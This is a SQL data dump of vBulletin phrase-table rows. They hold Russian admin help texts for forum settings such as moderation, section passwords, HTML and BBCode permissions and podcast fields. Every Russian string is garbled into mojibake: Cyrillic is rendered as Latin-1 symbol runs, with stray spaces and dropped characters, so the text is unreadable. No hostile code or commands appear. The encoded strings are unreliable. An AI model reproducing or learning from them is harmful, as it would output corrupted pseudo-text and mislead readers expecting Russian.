(22350, -1, 'forum_add_edit_newthreademail_text', 'cphelptext', 'Ââåäèòå à äðåñà ýëåêòðîÃÃîé ïî÷òû òåõ, êòî äîëæåà áûòü óâåäîìë¸à î ïîÿâëåÃèè â ðà çäåëå Ãîâîé òåìû. Ãà çäåëÿéòå à äðåñà ïðîáåëà ìè, åñëè èõ Ãåñêîëüêî. ÃÃ¥ ðåêîìåÃäóåòñÿ óêà çûâà òü çäåñü à äðåñà ìîäåðà òîðîâ - âû ìîæåòå âûáðà òü, áóäåò ëè ìîäåðà òîð ïîëó÷à òü óâåäîìëåÃèå î Ãîâîé òåìå â Ãà ñòðîéêà õ ïðà â ýòîãî ìîäåðà òîðà . Åñëè âû äîáà âèëè à äðåñ ïîëüçîâà òåëÿ è â óâåäîìëåÃèÿ î ñîîáùåÃèÿõ, è â óâåäîìëåÃèÿ î òåìà õ, ýòîò ÷åëîâåê áóäåò ïîëó÷à òü äâà ïèñüìà ïðè ñîçäà Ãèè Ãîâîé òåìû.', 'vbulletin', '', 0, ''),
(22351, -1, 'forum_add_edit_newthreademail_title', 'cphelptext', 'Àäðåñà ýëåêòðîÃÃîé ïî÷òû äëÿ óâåäîìëåÃèÿ î ïîÿâëåÃèè Ãîâîé òåìû', 'vbulletin', '', 0, ''),
(22352, -1, 'forum_add_edit_moderatenewpost_text', 'cphelptext', 'Åñëè âêëþ÷åÃî, òî ñîîáùåÃèÿ Ãà ôîðóìå ÃÃ¥ áóäóò ïîêà çà Ãû äî òåõ ïîð, ïîêà ìîäåðà òîð ÃÃ¥ îäîáðèò èõ.', 'vbulletin', '', 0, ''),
(22353, -1, 'forum_add_edit_moderatenewpost_title', 'cphelptext', 'Ãðîâåðêà ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(22354, -1, 'forum_add_edit_moderatenewthread_text', 'cphelptext', 'Îïðåäåëÿåò, òðåáóåòñÿ ëè ïðîâåðêà òåì â ýòîì ðà çäåëå. Åñëè óñòà Ãîâèòü \"Äà \", òî Ãîâà ÿ òåìà áóäåò îòîáðà æà òüñÿ òîëüêî ïîñëå ïîäòâåðæäåÃèÿ ìîäåðà òîðà .', 'vbulletin', '', 0, ''),
(22355, -1, 'forum_add_edit_moderatenewthread_title', 'cphelptext', 'Ãðîâåðêà òåì', 'vbulletin', '', 0, ''),
(22356, -1, 'forum_add_edit_moderateattach_text', 'cphelptext', 'Îïðåäåëÿåò, òðåáóåòñÿ ëè ïðîâåðêà âëîæåÃèé â ýòîì ðà çäåëå. Åñëè óñòà Ãîâèòü \"Äà \", òî âëîæåÃèå áóäåò îòîáðà æà òüñÿ òîëüêî ïîñëå ïîäòâåðæäåÃèÿ ìîäåðà òîðà (äî ýòîãî ìîìåÃòà ñîîáùåÃèå áóäåò îòîáðà æà òüñÿ ñ óâåäîìëåÃèåì îá óñïåøÃîì ïðèñîåäèÃÃ¥Ãèè âëîæåÃèÿ, òðåáóþùåãî ïðîâåðêè).', 'vbulletin', '', 0, ''),
(22357, -1, 'forum_add_edit_moderateattach_title', 'cphelptext', 'Ãðîâåðêà âëîæåÃèé', 'vbulletin', '', 0, ''),
(22358, -1, 'forum_add_edit_styleid_text', 'cphelptext', 'Âû ìîæåòå âûáðà òü, êà êîé ñòèëü èñïîëüçîâà òü äëÿ ýòîãî ðà çäåëà . Ãòîò ñòèëü áóäåò èñïîëüçîâà òüñÿ âìåñòî ñòèëÿ ðà çäåëà ïî óìîë÷à Ãèþ, åñëè òà êîé óñòà ÃîâëåÃ.', 'vbulletin', '', 0, ''),
(22359, -1, 'forum_add_edit_styleid_title', 'cphelptext', 'Ñòèëü ðà çäåëà ', 'vbulletin', '', 0, ''),
(22360, -1, 'forum_add_edit_styleoverride_text', 'cphelptext', 'Âûáîð ýòîãî ïóÃêòà çà ñòà âèò îñîáûé ñòèëü, âûáðà ÃÃûé âà ìè âûøå, èñïîëüçîâà òüñÿ âìåñòî òîãî ñòèëÿ, êîòîðûé âûáðà ë ïîëüçîâà òåëü.', 'vbulletin', '', 0, ''),
(22361, -1, 'forum_add_edit_styleoverride_title', 'cphelptext', 'ÃðèÃóäèòåëüÃûé âûáîð ñòèëÿ', 'vbulletin', '', 0, ''),
(22362, -1, 'forum_add_edit_imageprefix_text', 'cphelptext', 'Èçîáðà æåÃèÿ ñòà òóñà ðà çäåëà îáû÷Ãî îòîáðà æà þòñÿ ðÿäîì ñ ðà çäåëîì â ñïèñêå ðà çäåëîâ, ÷òîáû ïîêà çà òü ñòà òóñ ïðî÷òåÃèÿ. \r\n \r\nÃðåôèêñ äîëæåà ñîäåðæà òü òîëüêî ëà òèÃñêèå áóêâû è öèôðû, à òà êæå - _ / . . ÌîæÃî äà æå ñîçäà òü îòäåëüÃóþ ïîääèðåêòîðèþ äèðåêòîðèè èêîÃîê ñòà òóñà . \r\n \r\nÑëåäóþùèå èçîáðà æåÃèÿ èñïîëüçóþòñÿ äëÿ èêîÃîê ñòà òóñà , ïî ýòîìó îáðà çöó âà ì ñëåäóåò çà ãðóçèòü èçîáðà æåÃèÿ ñ óêà çà ÃÃûì çäåñü ïðåôèêñîì.\r\n\r\nforum_link.gif \r\nforum_new.gif \r\nforum_new_lock.gif \r\nforum_old.gif \r\nforum_old_lock.gif \r\n ', 'vbulletin', 'zCarot', 1194284205, '3.7.0 Beta 1'),
(22363, -1, 'forum_add_edit_imageprefix_title', 'cphelptext', 'Ãðåôèêñ äëÿ èçîáðà æåÃèé ñòà òóñà ðà çäåëîâ', 'vbulletin', 'zCarot', 1191578675, '3.7.0 Beta 1'),
(22364, -1, 'forum_add_edit_password_text', 'cphelptext', 'Åñëè âû óñòà Ãîâèòå ïà ðîëü, ïîëüçîâà òåëü äîëæåà áóäåò ââåñòè ïà ðîëü ïðåæäå, ÷åì îà ñìîæåò çà éòè â ýòîò ðà çäåë. Ó ïîëüçîâà òåëÿ äîëæÃà áûòü âêëþ÷åÃà ïîääåðæêà cookies, ÷òîáû ïîïà ñòü â ðà çäåë, çà ùèùåÃÃûé ïà ðîëåì. Ãòîò ïà ðîëü áóäåò óÃà ñëåäîâà à ïîäðà çäåëà ìè, åñëè â Ãà ñòðîéêà õ ïîñëåäÃèõ ÃÃ¥ óñòà Ãîâëåà çà ïðåò èñïîëüçîâà Ãèÿ ïà ðîëÿ. Äà æå åñëè ïîëüçîâà òåëü çÃà åò ïà ðîëü, Ãî ïðèÃà äëåæèò ãðóïïå ïîëüçîâà òåëåé, ó êîòîðîé Ãåò äîñòóïà ê ýòîìó ðà çäåëó, â äîñòóïå åìó áóäåò îòêà çà Ãî .', 'vbulletin', '', 0, ''),
(22365, -1, 'forum_add_edit_password_title', 'cphelptext', 'Ãà ðîëü äîñòóïà ', 'vbulletin', '', 0, ''),
(22366, -1, 'forum_add_edit_canhavepassword_text', 'cphelptext', 'Åñëè óñòà Ãîâèòü çäåñü \"Ãåò\", ìîäåðà òîðû ÃÃ¥ ñìîãóò óñòà Ãà âëèâà òü ïà ðîëè äëÿ ýòîãî ðà çäåëà (äà æå åñëè âû äà äèòå èì ãëîáà ëüÃóþ âîçìîæÃîñòü äåëà òü ýòî). Âû, êà ê à äìèÃèñòðà òîð, ïî-ïðåæÃåìó ñìîæåòå ñòà âèòü ïà ðîëè Ãà ýòîò ðà çäåë, Ãî ïîêà âû ýòîãî ÃÃ¥ ñäåëà åòå, ýòîò ðà çäåë ÃÃ¥ áóäåò çà ùèùåà ïà ðîëåì, äà æå åñëè ðîäèòåëüñêèå ðà çäåëû èìåþò åãî.', 'vbulletin', 'zCarot', 1147897987, '3.6.0 Beta 1'),
(22367, -1, 'forum_add_edit_canhavepassword_title', 'cphelptext', 'ÂîçìîæÃîñòü óñòà Ãîâêè ïà ðîëÿ', 'vbulletin', '', 0, ''),
(22368, -1, 'forum_add_edit_cancontainthreads_text', 'cphelptext', 'Åñëè óñòà Ãîâèòü çäåñü \"Ãåò\", ýòîò ðà çäåë áóäåò îòîáðà æà òüñÿ êà ê êà òåãîðèÿ (ò.Ã¥. ðà çäåë áåç âîçìîæÃîñòè Ãà ïèñà Ãèÿ ñîîáùåÃèé, êîòîðûé ïðîñòî îáúåäèÃÿåò Ãåñêîëüêî äðóãèõ ðà çäåëîâ).', 'vbulletin', '', 0, ''),
(22369, -1, 'forum_add_edit_cancontainthreads_title', 'cphelptext', 'Êà òåãîðèÿ/ðà çäåë', 'vbulletin', '', 0, ''),
(22370, -1, 'forum_add_edit_active_text', 'cphelptext', 'Óñòà Ãîâêà â \"Ãåò\" ýêâèâà ëåÃòÃà óñòà Ãîâêå \"Ãîðÿäêà îòîáðà æåÃèÿ\"=0, ò.ê. ðà çäåë ÃÃ¥ áóäåò îòîáðà æà òüñÿ Ãèãäå, Ãî ê Ãåìó ìîæÃî áóäåò ïîëó÷èòü äîñòóï, Ãà áðà â URL âðó÷Ãóþ.', 'vbulletin', '', 0, ''),
(22371, -1, 'forum_add_edit_active_title', 'cphelptext', 'ÀêòèâÃî', 'vbulletin', '', 0, ''),
(22372, -1, 'forum_add_edit_allowposting_text', 'cphelptext', 'Ãîçâîëÿåò ñîçäà òü ðà çäåë, êîòîðûé áóäåò ðà áîòà òü êà ê à ðõèâ - Ãèêòî, êðîìå à äìèÃèñòðà òîðîâ, ÃÃ¥ áóäåò èìåòü ïðà âî ïèñà òü â Ãåãî.', 'vbulletin', '', 0, ''),
(22373, -1, 'forum_add_edit_allowposting_title', 'cphelptext', 'Îòêðûò äëÿ Ãîâûõ ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(22374, -1, 'forum_add_edit_indexposts_text', 'cphelptext', 'Åñëè çäåñü óñòà ÃîâëåÃî \"Ãåò\", ñîîáùåÃèÿ, ðà çìåùåÃÃûå â ýòîì ðà çäåëå, ÃÃ… ÃÓÄÓÒ èÃäåêñèðîâà òüñÿ â ïîèñêîâîé ñèñòåìå ôîðóìà . Òà êèå ñîîáùåÃèÿ áóäóò ÃåäîñòóïÃû äëÿ ïîèñêà . Ãòî ìîæåò áûòü ïîëåçÃî äëÿ òåñòîâîãî ðà çäåëà ëèáî äëÿ ðà çäåëà ôëåéìà , êîòîðûé âû ÃÃ¥ õîòèòå èÃäåêñèðîâà òü.', 'vbulletin', '', 0, ''),
(22375, -1, 'forum_add_edit_indexposts_title', 'cphelptext', 'Ãîâûå ñîîáùåÃèÿ èÃäåêñèðóþòñÿ â ïîèñêîâîé ñèñòåìå', 'vbulletin', '', 0, ''),
(22376, -1, 'forum_add_edit_allowhtml_text', 'cphelptext', 'Ãà çðåøà åò ïîëüçîâà òåëÿì èñïîëüçîâà òü HTML äëÿ ôîðìà òèðîâà Ãèÿ ñîîáùåÃèé. Î÷åÃü ðåêîìåÃäóåòñÿ ÃÃ… âêëþ÷à òü ýòó îïöèþ, ò.ê. ýòî ìîæåò ñÃèçèòü áåçîïà ñÃîñòü è/èëè ñèëüÃî èñïîðòèòü âÃåøÃèé âèä, åñëè ïîëüçîâà òåëè èñïîëüçóþò ÃåêîððåêòÃûé HTML êîä. Äà æå åñëè âû óñòà Ãîâèòå çäåñü \"Äà \", ïîëüçîâà òåëè âñå ðà âÃî ÃÃ¥ ñìîãóò èñïîëüçîâà òü Ãåêîòîðûå òåãè, Ãà ïðèìåð javascript: è about:.', 'vbulletin', '', 0, ''),
(22377, -1, 'forum_add_edit_allowhtml_title', 'cphelptext', 'Ãà çðåøèòü HTML êîä â ñîîáùåÃèÿõ', 'vbulletin', '', 0, ''),
(22378, -1, 'forum_add_edit_allowbbcode_text', 'cphelptext', 'Ãà çðåøà åò ïîëüçîâà òåëÿì èñïîëüçîâà òü BB êîäû â ñâîèõ ñîîáùåÃèÿõ. Åñëè çäåñü óñòà Ãîâèòü \"Äà \", à â ñëåäóþùåé îïöèè \"Ãåò\", ïîëüçîâà òåëè ÃÃ¥ ñìîãóò èñïîëüçîâà òü êîä \"IMG\".', 'vbulletin', 'zCarot', 1206964412, '3.7.0 Release Candidate 2'),
(22379, -1, 'forum_add_edit_allowbbcode_title', 'cphelptext', 'Ãà çðåøèòü BB êîäû â ñîîáùåÃèÿõ', 'vbulletin', 'zCarot', 1206964420, '3.7.0 Release Candidate 2'),
(22380, -1, 'forum_add_edit_allowimages_text', 'cphelptext', 'Ãà çðåøà åò ïîëüçîâà òåëüñêèì èçîáðà æåÃèÿì îòîáðà æà òüñÿ ïðÿìî â ñîîáùåÃèè Ãà ñòðà Ãèöå ïðîñìîòðà òåìû. Åñëè âû óñòà Ãîâèòå çäåñü \"Ãåò\", òî âìåñòî ñà ìîãî èçîáðà æåÃèÿ áóäåò ïîêà çà Ãà ññûëêà Ãà Ãåãî.', 'vbulletin', '', 0, ''),
(22381, -1, 'forum_add_edit_allowimages_title', 'cphelptext', 'Ãà çðåøèòü BB êîä \"IMG\" â ñîîáùåÃèÿõ', 'vbulletin', '', 0, ''),
(22382, -1, 'forum_add_edit_allowsmilies_text', 'cphelptext', 'Óñòà Ãîâêà ýòîé îïöèè â \"Äà \" ðà çðåøèò ïîëüçîâà òåëÿì èñïîëüçîâà òü îïðåäåëåÃÃûå ñî÷åòà Ãèÿ ñèìâîëîâ, Ãà ïðèìåð :) è :( , êîòîðûå áóäóò à âòîìà òè÷åñêè çà ìåÃÃ¥Ãû ñîîòâåòñòâóþùèìè èçîáðà æåÃèÿìè.', 'vbulletin', '', 0, ''),
(22383, -1, 'forum_add_edit_allowsmilies_title', 'cphelptext', 'Ãà çðåøèòü ñìà éëû â ñîîáùåÃèÿõ', 'vbulletin', '', 0, ''),
(22384, -1, 'forum_add_edit_allowicons_text', 'cphelptext', 'Åñëè óñòà Ãîâèòü çäåñü \"Äà \", ïîëüçîâà òåëè ñìîãóò âûáèðà òü èêîÃêè, õà ðà êòåðèçóþùèå ñîîáùåÃèÿ. ÈêîÃêà îòîáðà æà åòñÿ ðÿäîì ñ çà ãîëîâêîì (åñëè òà êîâîé åñòü) êà æäîãî ñîîáùåÃèÿ, à òà êæå îòîáðà æà åòñÿ ïðè ïðîñìîòðå ðà çäåëà îêîëî çà ãîëîâêà òåìû, åñëè èêîÃêà óñòà ÃîâëåÃà äëÿ ïåðâîãî ñîîáùåÃèÿ â òåìå.', 'vbulletin', '', 0, ''),
(22385, -1, 'forum_add_edit_allowicons_title', 'cphelptext', 'Ãà çðåøèòü èêîÃêè ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(22386, -1, 'forum_add_edit_allowratings_text', 'cphelptext', 'Åñëè óñòà Ãîâèòü çäåñü \"Äà \", ïîëüçîâà òåëè ñìîãóò îöåÃèâà òü òåìû ýòîãî ðà çäåëà . ÃŽÃè ìîãóò îöåÃèâà òü èõ ëèáî âÃèçó ñòðà Ãèöû ïðîñìîòðà òåìû, ëèáî â ïðîöåññå îòâåòà â òåìå.', 'vbulletin', '', 0, ''),
(22387, -1, 'forum_add_edit_allowratings_title', 'cphelptext', 'Ãà çðåøèòü îöåÃèâà òü òåìû â ýòîì ðà çäåëå', 'vbulletin', '', 0, ''),
(22388, -1, 'forum_add_edit_countposts_text', 'cphelptext', 'Åñëè çäåñü óñòà Ãîâèòü \"Ãåò\", ñîîáùåÃèÿ, ðà çìåùåÃÃûå â ýòîì ðà çäåëå, ÃÃ¥ áóäóò äîáà âëåÃû ê ñ÷¸ò÷èêó ñîîáùåÃèé ïîëüçîâà òåëÿ (êîòîðûé îòîáðà æà åòñÿ ïðè ïðîñìîòðå òåìû).', 'vbulletin', '', 0, ''),
(22389, -1, 'forum_add_edit_countposts_title', 'cphelptext', 'Ãðèáà âëÿòü ñîîáùåÃèÿ ïîëüçîâà òåëÿ â ýòîì ðà çäåëå ê åãî ñ÷¸ò÷èêó ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(22390, -1, 'forum_add_edit_showonforumjump_text', 'cphelptext', 'Âêëþ÷èòå ýòó îïöèþ, ÷òîáû îòîáðà æà òü ðà çäåë è âñå åãî ïîäðà çäåëû â ìåÃþ áûñòðîãî ïåðåõîäà ïî ôîðóìó.', 'vbulletin', '', 0, ''),
(22391, -1, 'forum_add_edit_showonforumjump_title', 'cphelptext', 'Ãîêà çûâà òü â ìåÃþ áûñòðîãî ïåðåõîäà ', 'vbulletin', '', 0, ''),
(22392, -1, 'forum_add_edit_prefixset_text', 'cphelptext', 'Âûáåðèòå Ãà áîðû ïðåôèêñîâ, êîòîðûå ìîãóò èñïîëüçîâà òüñÿ â ýòîì ðà çäåëå. ÃîìÃèòå, ÷òî åñëè âû Ãè÷åãî ÃÃ¥ âûáåðèòå çäåñü, òî îïöèÿ \"Òðåáîâà òü Ãà ëè÷èå ïðåôèêñà òåìû\" ÃÃ¥ áóäåò Ãè Ãà ÷òî âëèÿòü.', 'vbulletin', 'zCarot', 1190109651, '3.7.0 Beta 1'),
(22393, -1, 'forum_add_edit_prefixset_title', 'cphelptext', 'Èñïîëüçîâà òü âûáðà ÃÃûå Ãà áîðû ïðåôèêñîâ', 'vbulletin', 'zCarot', 1190109651, '3.7.0 Beta 1'),
(22394, -1, 'forum_add_edit_prefixrequired_text', 'cphelptext', 'Åñëè âû âûáðà ëè ýòó îïöèþ è óêà çà ëè âîçìîæÃîñòü èñïîëüçîâà Ãèÿ îäÃîãî èëè Ãåñêîëüêèõ Ãà áîðîâ ïðåôèêñîâ, òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò ñîçäà òü òåìó áåç ïðåôèêñà . \r\n \r\nÃîìÃèòå, ÷òî â áîëüøèÃñòâå ñëó÷à åâ åñòü âåðîÿòÃîñòü ñóùåñòâîâà Ãèÿ â ýòîì ðà çäåëå òåì áåç ïðåôèêñîâ. Ãòî ìîæåò ñëó÷èòüñÿ, åñëè òåìà áûëà ïåðåìåùåÃà , ëèáî èìïîðòèðîâà Ãà èç RSS ëåÃòû, èëè ìîäåðà òîð âðó÷Ãóþ óäà ëèë ïðåôèêñ.', 'vbulletin', 'zCarot', 1190109812, '3.7.0 Beta 1'),
(22395, -1, 'forum_add_edit_prefixrequired_title', 'cphelptext', 'Òðåáîâà òü Ãà ëè÷èå ïðåôèêñà òåìû', 'vbulletin', 'zCarot', 1190109812, '3.7.0 Beta 1'),
(22396, -1, 'forum_edit_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ðåäà êòèðóåòå Ãà ñòðîéêè ñóùåñòâóþùåãî ðà çäåëà . Îïöèè è ïà ðà ìåòðû îïèñà Ãû Ãèæå. \r\n Åñëè âû èçìåÃèòå êà êèå-òî îïöèè ñîçäà Ãèÿ ñîîáùåÃèé âÃèçó ñòðà Ãèöû, âà ì ïðèäåòñÿ ïåðåôîðìèðîâà òü ÊÃØ ñîîáùåÃèé äëÿ îáÃîâëåÃèÿ ñóùåñòâóþùèõ ñîîáùåÃèé ðà çäåëà .', 'vbulletin', '', 0, ''),
(22397, -1, 'forum_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå Ãà ñòðîåê ðà çäåëà ', 'vbulletin', '', 0, ''),
(22398, -1, 'forum_edit_applypwdtochild_text', 'cphelptext', 'Åñëè çäåñü óñòà ÃîâëåÃî \"Äà \" è ïðîèñõîäèò äîáà âëåÃèå/ñìåÃà ïà ðîëÿ, ïà ðîëü áóäåò îòÃîñèòüñÿ è êî âñåì ïîäðà çäåëà ì ýòîãî ðà çäåëà . Ãòîãî ÃÃ¥ ïðîèçîéäåò , åñëè âû ÃÃ¥ ñìåÃèòå òåêóùèé ïà ðîëü èëè ÃÃ¥ äîáà âèòå Ãîâûé.', 'vbulletin', '', 0, ''),
(22399, -1, 'forum_edit_applypwdtochild_title', 'cphelptext', 'Ãðèñâîèòü ïà ðîëü âñåì ïîäðà çäåëà ì', 'vbulletin', '', 0, ''),
(22400, -1, 'forum_modify_text', 'cphelptext', 'Ñòðà Ãèöå ðåäà êòèðîâà Ãèÿ Ãà ñòðîåê ðà çäåëîâ ñîäåðæèò ñïèñîê âñåõ âà øèõ ðà çäåëîâ, âêëþ÷à ÿ òå, êîòîðûå ñêðûòû îò êîÃå÷Ãûõ ïîëüçîâà òåëåé. Ãà ýòîé ñòðà Ãèöå âû ìîæåòå óñòà Ãîâèòü ïîðÿäîê îòîáðà æåÃèÿ (ÃÃ¥ çà áóäüòå Ãà æà òü \"Ñîõðà Ãèòü ïîðÿäîê îòîáðà æåÃèÿ\" äëÿ ñîõðà ÃÃ¥Ãèÿ èçìåÃÃ¥Ãèé). \r\n Ãà ïðîòèâ çà ãîëîâêà êà æäîãî ðà çäåëà , Ãà õîäÿòñÿ ñëåäóþùèå îïöèè: \r\nÃåäà êòèðîâà òü : ïîçâîëÿåò âà ì ìåÃÿòü Ãà ñòðîéêè ðà çäåëà . (Ñì. Ãåäà êòèðîâà Ãèå ðà çäåëîâ ) \r\nÓäà ëèòü : óäà ëÿåò ðà çäåë, âñå ïîäðà çäåëû è ñîîáùåÃèÿ â Ãèõ. Óäà ëåÃèå ïîäðà çäåëîâ è èõ ñîîáùåÃèé ÃÅÈÇÃÅÆÃÀ , ïîýòîìó î÷åÃü ðåêîìåÃäóåòñÿ ñäåëà òü ðåçåðâÃóþ êîïèþ âà øåé áà çû äà ÃÃûõ, ïðåæäå ÷åì óäà ëÿòü ðà çäåë. \r\nÄîáà âèòü ïîäðà çäåë : ïîçâîëÿåò âà ì äîáà âèòü Ãîâûé ðà çäåë, êîòîðûé ñòà Ãåò ïîäðà çäåëîì âûáðà ÃÃîãî âà ìè ðà çäåëà . (Ñì. Äîáà âëåÃèå ðà çäåëîâ ) \r\nÄîáà âèòü ìîäåðà òîðà : ïîçâîëÿåò âà ì äîáà âèòü ìîäåðà òîðà äëÿ ýòîãî ðà çäåëà . Ìîäåðà òîðû ñëåäÿò çà ïîðÿäêîì â âûáðà ÃÃûõ ðà çäåëà õ è âñåõ èõ ïîäðà çäåëà õ. (Ñì. Äîáà âëåÃèå ìîäåðà òîðîâ ) \r\nÄîáà âèòü îáúÿâëåÃèå : ïîçâîëÿåò âà ì äîáà âèòü îáúÿâëåÃèå â ýòîò ðà çäåë. (Ñì. Äîáà âëåÃèå îáúÿâëåÃèé ) \r\nÃåðåìåñòèòü ñîäåðæèìîå : âû ìîæåòå áûñòðî ïåðåìåñòèòü âñå ñîîáùåÃèÿ âûáðà ÃÃîãî ðà çäåëà â äðóãîé ðà çäåë. \r\nÃóñòîé ðà çäåë : âûáîð ýòîãî ïóÃêòà ïîâëå÷åò (ïîñëå ïîäòâåðæäåÃèÿ) óäà ëåÃèå âñåõ òåì èç ðà çäåëà . \r\n ñëåäóþùåé êîëîÃêå - ïîðÿäîê îòîáðà æåÃèÿ. Çäåñü îïðåäåëÿåòñÿ, â êà êîì ïîðÿäêå îòîáðà æà þòñÿ ðà çäåëû ãäå áû îÃè ÃÃ¥ îòîáðà æà ëèñü, âêëþ÷à ÿ êîÃòðîëüÃóþ ïà Ãåëü à äìèÃèñòðà òîðà . Åñëè óñòà Ãîâèòü çäåñü 0 äëÿ êà êîãî-òî ðà çäåëà , ýòîò ðà çäåë ñòà Ãåò Ãåâèäèìûì äëÿ êîÃå÷Ãîãî ïîëüçîâà òåëÿ, Ãî ê Ãåìó ïî ïðåæÃåìó ìîæÃî áóäåò ïîëó÷èòü äîñòóï, ââåäÿ ïðà âèëüÃûé URL à äðåñ ðà çäåëà . ÃÃ¥ çà áóäüòå Ãà æà òü \'Ñîõðà Ãèòü ïîðÿäîê îòîáðà æåÃèÿ\', åñëè âû ÷òî-òî ìåÃÿëè. \r\nÃîñëåäÃåå âûïà äà þùåå ìåÃþ ïîêà çûâà åò, ñêîëüêî ìîäåðà òîðîâ óæå åñòü ó êà æäîãî ðà çäåëà . Åñëè òà êîâûå åñòü, îÃè áóäóò â ñïèñêå. Âû ìîæåòå èçìåÃèòü ïðà âà ìîäåðà òîðîâ, âûáèðà ÿ èõ èìåÃà èç ýòîãî ñïèñêà .', 'vbulletin', 'zCarot', 1205430963, '3.7.0 Release Candidate 1'),
(22401, -1, 'forum_modify_title', 'cphelptext', 'Ãà ñòðîéêà ðà çäåëîâ', 'vbulletin', '', 0, ''),
(22402, -1, 'forum_podcast_author_text', 'cphelptext', 'Äà ÃÃûé òåêñò áóäåò ïîêà çà à â êîëîÃêå Àâòîð â iTunes.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22403, -1, 'forum_podcast_author_title', 'cphelptext', 'Àâòîð ñîäåðæèìîãî', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22404, -1, 'forum_podcast_categoryid_text', 'cphelptext', '×òîáû äîáà âèòü âà ø ïîäêà ñò â iTunes, âû äîëæÃû îáÿçà òåëüÃî óêà çà òü åãî êà òåãîðèþ.', 'vbulletin', 'zCarot', 1153512128, '3.6.0 Release Candidate 3'),
(22405, -1, 'forum_podcast_categoryid_title', 'cphelptext', 'Êà òåãîðèÿ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22406, -1, 'forum_podcast_enabled_text', 'cphelptext', 'Ãòà îïöèÿ âêëþ÷à åò âûâîä ñïåöèôè÷åñêèõ òåãîâ äëÿ iTunes. Åñëè âû âûêëþ÷èòå å¸, òî ïîäêà ñòû âñ¸ ðà âÃî áóäóò ðà áîòà òü â iTunes áåç èÃôîðìà öèè, óêà çà ÃÃîé Ãà ýòîé ñòðà Ãèöå, Ãî äðóãèå ïîëüçîâà òåëè óæå ÃÃ¥ ñìîãóò äîáà âèòü äà ÃÃûé ïîäêà ñò â iTunes.', 'vbulletin', 'zCarot', 1153746125, '3.6.0 Release Candidate 3'),
(22407, -1, 'forum_podcast_enabled_title', 'cphelptext', 'Âêëþ÷èòü', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22408, -1, 'forum_podcast_explicit_text', 'cphelptext', 'Èñïîëüçóåòñÿ êà ê èÃäèêà òîð òîãî, ñîäåðæèò ëè âà ø ïîäêà ñò ïîäðîáÃûé ìà òåðèà ë.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22409, -1, 'forum_podcast_explicit_title', 'cphelptext', 'ÃîäðîáÃî', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22410, -1, 'forum_podcast_image_text', 'cphelptext', 'Èçîáðà æåÃèå äîëæÃî îòîáðà æà òü ñóòü äà ÃÃîãî ïîäêà ñòà . iTunes ïðåäïî÷èòà åò êâà äðà òÃûå èçîáðà æåÃèÿ ôîðìà òà .jpg èëè .png, ðà çìåðîì ÃÃ¥ ìåÃåå 300 õ 300 ïèêñåëåé.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22411, -1, 'forum_podcast_image_title', 'cphelptext', 'Ññûëêà Ãà èçîáðà æåÃèå', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22412, -1, 'forum_podcast_keywords_text', 'cphelptext', 'Ãòè ñëîâà ìîãóò áûòü èñïîëüçîâà Ãû ïðè ïîèñêå äà ÃÃîãî ïîäêà ñòà â iTunes. Èñïîëüçóéòå çà ïÿòûå äëÿ îòäåëåÃèÿ ñëîâ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22413, -1, 'forum_podcast_keywords_title', 'cphelptext', 'Êëþ÷åâûå ñëîâà ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22414, -1, 'forum_podcast_owneremail_text', 'cphelptext', 'Ãòîò à äðåñ áóäåò èñïîëüçîâà Ãî ïðè êîÃòà êòå ñ ñîáñòâåÃÃèêîì ïîäêà ñòà .', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22415, -1, 'forum_podcast_owneremail_title', 'cphelptext', 'Àäðåñ ýëåêòðîÃÃîé ïî÷òû ñîáñòâåÃÃèêà ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22416, -1, 'forum_podcast_ownername_text', 'cphelptext', 'Ãòî èìÿ áóäåò èñïîëüçîâà Ãî ïðè êîÃòà êòå ñ ñîáñòâåÃÃèêîì ïîäêà ñòà .', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22417, -1, 'forum_podcast_ownername_title', 'cphelptext', 'Èìÿ ñîáñòâåÃÃèêà ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22418, -1, 'forum_podcast_subtitle_text', 'cphelptext', 'Ñîäåðæèìîå ýòîãî òåãà áóäåò ïîêà çà Ãî â êîëîÃêå Îïèñà Ãèå â iTunes. Ëó÷øå âñåãî, ÷òîáû ïîäçà ãîëîâîê ñîñòîÿë òîëüêî èç Ãåáîëüøèõ ñëîâ. Åñëè âû ÃÃ¥ çà ïîëÃèòå ýòî ïîëå, òî áóäåò èñïîëüçîâà òüñÿ ïîëå Ñâîäêà .', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22419, -1, 'forum_podcast_subtitle_title', 'cphelptext', 'Ãîäçà ãîëîâîê', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
